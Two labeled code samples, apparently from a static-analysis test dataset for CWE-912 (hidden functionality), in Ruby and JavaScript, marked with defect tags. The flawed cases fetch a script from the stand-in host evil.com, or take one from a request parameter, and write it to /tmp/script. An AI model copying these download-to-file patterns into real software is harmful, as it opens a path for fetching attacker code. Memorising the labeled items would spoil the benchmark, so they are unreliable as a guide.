File: codeql_ruby/cwe-912/http_to_file_access.rb
require "net/http"

# {fact rule=hidden-functionality@v1.0 defects=1}
resp = Net::HTTP.new("evil.com").get("/script").body
file = File.open("/tmp/script", "w")
file.write(resp) # BAD

# {/fact}

class ExampleController < ActionController::Base
# {fact rule=hidden-functionality@v1.0 defects=1}
    def example
      script = params[:script]
      file = File.open("/tmp/script", "w")
      file.write(script) # BAD
    end
# {/fact}

# {fact rule=hidden-functionality@v1.0 defects=0}
    def example2
      a = "a"
      file = File.open("/tmp/script", "w")
      file.write(a) # GOOD
    end
# {/fact}
end

File: Javascript/local-codeql_javascript/codeql_javascript_dataset/CWE-912/examples/HttpToFileAccess.js
//{fact rule=insecure-temporary-file@v1.0 defects=1}

var https = require("https");
var fs = require("fs");

https.get('https://evil.com/script', res => {
  res.on("data", d => {
    fs.writeFileSync("/tmp/script", d)
  })
});


//{/fact}
